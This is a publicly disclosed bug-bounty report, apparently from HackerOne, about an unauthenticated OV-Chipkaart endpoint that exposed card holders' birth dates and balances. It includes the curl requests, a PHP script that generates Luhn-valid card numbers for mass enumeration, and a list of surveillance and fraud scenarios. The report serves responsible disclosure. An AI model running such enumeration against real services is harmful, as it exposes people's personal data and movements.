Personal data of all Dutch public transport cards ("OV-Chipkaart") accessible
State Resolved (Closed)
Disclosed publicly 2018-09-11T22:52:47.136Z
Reported To
Weakness none
Bounty
Collapse
Summary by bandjes

December 19, 2017, an article on Tweakers.net was published about a publicly accessible form showing the balance and the date of last activity of any public transport card you fill in. Short after this article being published a comment on the article stated that the date of birth of the card's owner was also available via the webshop of the Dutch railway company (NS). This was triggering me because it looked like a lot more information than only the balance and last activity date is available via a public accessible endpoint on the web.

Let's do some digging

Following the information in the article on Tweakers.net, I started looking around on the page where a publicly accessible form is available to check the balance of all cards. Via the network tab in the developer tools, I noticed that each request involves Google reCaptcha to pass. Leaving this HTTP header out resulted in an error message.

curl 'https://www.ov-chipkaart.nl/api/medium/v1/saldocheckerpagedata' \
  -H 'Host: www.ov-chipkaart.nl' \
  -H 'User-Agent: (...)' \
  -H 'Referer: https://www.ov-chipkaart.nl/saldo-terugvragen/saldochecker.htm' \
  -H 'Content-Type: application/json' \
  -H 'Origin: https://www.ov-chipkaart.nl' \
  --data '{"mediumId":"352802080********"}'
{
  "errorCode": 120,
  "message": "Onjuiste recaptcha token."
}

This endpoint was not much of use… I decided to log in to my personal account and watch all the network traffic in my developer console while clicking some elements in the dashboard. One of the requests caught my attention: https://www.ov-chipkaart.nl/web/medium_information. This POST request, filled with the parameters hashedMediumId and languagecode, responded with something I was looking for:

curl 'https://www.ov-chipkaart.nl/web/medium_information' \
  -H 'Host: www.ov-chipkaart.nl' \
  -H 'User-Agent: (...)' \
  -H 'Referer: https://www.ov-chipkaart.nl/mijn-ov-chip/mijn-ov-reishistorie.htm?mediumid=(...)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: https://www.ov-chipkaart.nl' \
  -H 'Cookie: (...)' \
  -H 'X-Requested-With: XMLHttpRequest' \
  --data 'hashedMediumId=(...)&languagecode=nl-NL'
{
  "dateOfBirth": "01-01-1970",
  "ePurseRemainingAmount": 13.37,
  "expiryDate": "01-01-2022",
  "isAutoReloadActive": false,
  "lastActivityTime": "01-01-2017 13:37",
  "locale": "nl_NL",
  "localeEPurseRemainingAmount": "€ 13,37",
  "mediumId": "35280208********",
  "mediumStatus": "Active",
  "mediumStatusDescription": "Actief",
  "mediumType": "Anonymous",
  "mediumTypeDescription": "Anonieme OV-chipkaart"
}

The only odd thing about this request was the parameter hashedMediumId. Where did its content come from and how was it calculated? Unfortunately, I could not find anything about this method in the resources of the page. A dead end. A bit disappointed I looked at the request again and, in a desperate attempt, I replaced the parameter hashedMediumId with just mediumId. Laughing at the idea this would ever work, I filled in a plain medium ID 35280208******** and pressed the return key and the exact same result came back!

Let the fun begin

So now I found this endpoint I removed the cookie headers used before in my cURL request and tried again. The same result came back, meaning this request could be used to retrieve data from all possible card numbers out there.

In order to confirm this, I made myself a list of possible card numbers, all starting with 35280200. To rule out a lot of numbers, I checked the validation algorithm behind the OV-Chipkaart. Finding this algorithm wasn’t that hard since the JavaScript validation method in the forms was called luhnCheck. So the algorithm used is the Luhn algorithm, a modulo 10 check, also used with e.g. IMEI numbers and credit card numbers. To generate this list I created the following PHP snippet:

<?php

function luhnCheck($number) {
    $number = (string) $number;
    $l = strlen($number);
    $n = $o = 0;
    $r = [
        [0,1,2,3,4,5,6,7,8,9],
        [0,2,4,6,8,1,3,5,7,9],
    ];

    for ($t = $l; $t--; ) {
        $o += $r[$n][(int) $number{$t}];
        $n ^= 1;
    }

    return $o % 10 === 0 && $o > 0;
}

$fh = fopen(__DIR__ . DIRECTORY_SEPARATOR . 'numbers.txt', 'a+');
$prefix = 35280200;

for ($i = 0; $i < 100000000; $i++) {
    $number = sprintf('%d%08d', $prefix, $i);

    if (luhnCheck($number)) {
        fwrite($fh, $number . PHP_EOL);
    }
}

fclose($fh);

It resulted in a file of 170 MB with 10 million card numbers. Next I picked 5 random numbers;

rl -c 5 numbers.txt

… and tried them all of them with the endpoint. All requests were successful and returned the same data structure as I received with my own card number.

Impact

The impact of this publicly accessible endpoint is huge. I will give three scenarios, but there are a lot more use cases for what you could do with this data.

  1. Querying the data of one specific OV-Chipkaart for every minute over a period of a month would give me a good insight into the daily schedule of its user. Calculating the difference of the card’s balance each time I query the data can give me an indication of where the user lives and traveling to since the fares for each route are pretty specific.
  2. Fetching the data of all possible card numbers gives me a nice insight into the average user. I could make charts of the average age of all users. The average balance of all users. The average card type. The total amount of money still available on cards.
  3. Using this form would give me the opportunity to reclaim the balance (max. € 20,-) of anonymous cards expired less than a year ago.

Timeline
submitted a report to OV-chipkaart .
2017-12-19T20:42:30.000Z

███████████████████████████████

Regards,
Frans

  • 0 attachments:
bandjes Activities::BugResolved
2017-12-19T20:42:30.000Z


bandjes Activities::ReportBecamePublic
2018-09-11T22:52:47.229Z